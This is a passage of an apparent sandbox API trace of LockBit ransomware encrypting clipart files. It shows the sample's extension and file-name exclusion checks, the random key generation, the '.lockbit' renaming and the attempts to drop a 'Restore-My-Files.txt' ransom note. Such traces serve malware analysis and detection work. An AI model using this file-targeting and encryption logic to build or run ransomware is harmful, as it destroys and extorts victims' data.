lpString2=".JPG") returned 1 [0121.081] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.082] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.082] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.083] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099150.JPG") returned 1 [0121.084] lstrcmpiW (lpString1="ntldr", lpString2="J0099150.JPG") returned 1 [0121.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099150.JPG") returned 1 [0121.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099150.JPG") returned -1 [0121.084] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099150.JPG") returned -1 [0121.084] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099150.JPG") returned 1 [0121.084] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099150.JPG") returned -1 [0121.084] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.084] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned=".JPG" [0121.084] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.084] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.084] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.084] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.085] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.085] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.085] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.085] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.085] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.085] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.lockbit") returned 72 [0121.085] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0121.086] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.086] malloc (_Size=0x40068) returned 0x3d70450 [0121.087] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=21914) returned 1 [0121.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0121.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0121.088] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0121.091] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.091] malloc (_Size=0xa6) returned 0x77d7a8 [0121.091] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.092] free (_Block=0x77d7a8) [0121.092] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.092] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.092] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x65e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099151.WMF", cAlternateFileName="")) returned 1 [0121.092] lstrcmpiW (lpString1=".", lpString2="J0099151.WMF") returned -1 [0121.092] lstrcmpiW (lpString1="..", lpString2="J0099151.WMF") returned -1 [0121.092] PathFindExtensionW (pszPath="J0099151.WMF") returned=".WMF" [0121.093] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.093] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.094] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.094] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099151.WMF") returned 1 [0121.095] lstrcmpiW (lpString1="ntldr", lpString2="J0099151.WMF") returned 1 [0121.095] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099151.WMF") returned 1 [0121.095] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099151.WMF") returned -1 [0121.095] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099151.WMF") returned -1 [0121.095] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099151.WMF") returned 1 [0121.095] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099151.WMF") returned -1 [0121.095] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.095] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned=".WMF" [0121.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.095] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.095] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.096] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.097] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.097] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.097] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.097] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.lockbit") returned 72 [0121.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.097] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.097] malloc (_Size=0x40068) returned 0x3df0008 [0121.098] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26086) returned 1 [0121.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.107] malloc (_Size=0xa6) returned 0x77d7a8 [0121.107] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.108] free (_Block=0x77d7a8) [0121.108] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.109] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.109] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x2dae, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099152.JPG", cAlternateFileName="")) returned 1 [0121.109] lstrcmpiW (lpString1=".", lpString2="J0099152.JPG") returned -1 [0121.109] lstrcmpiW (lpString1="..", lpString2="J0099152.JPG") returned -1 [0121.109] PathFindExtensionW (pszPath="J0099152.JPG") returned=".JPG" [0121.109] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.109] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.109] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.109] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.110] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.110] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.111] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.111] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.112] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.112] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.112] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099152.JPG") returned 1 [0121.112] lstrcmpiW (lpString1="ntldr", lpString2="J0099152.JPG") returned 1 [0121.112] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099152.JPG") returned 1 [0121.112] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099152.JPG") returned -1 [0121.112] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099152.JPG") returned -1 [0121.112] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099152.JPG") returned 1 [0121.112] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099152.JPG") returned -1 [0121.112] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.112] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned=".JPG" [0121.112] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.112] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.112] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.112] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.113] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.113] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.113] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.lockbit") returned 72 [0121.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0121.114] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.114] malloc (_Size=0x40068) returned 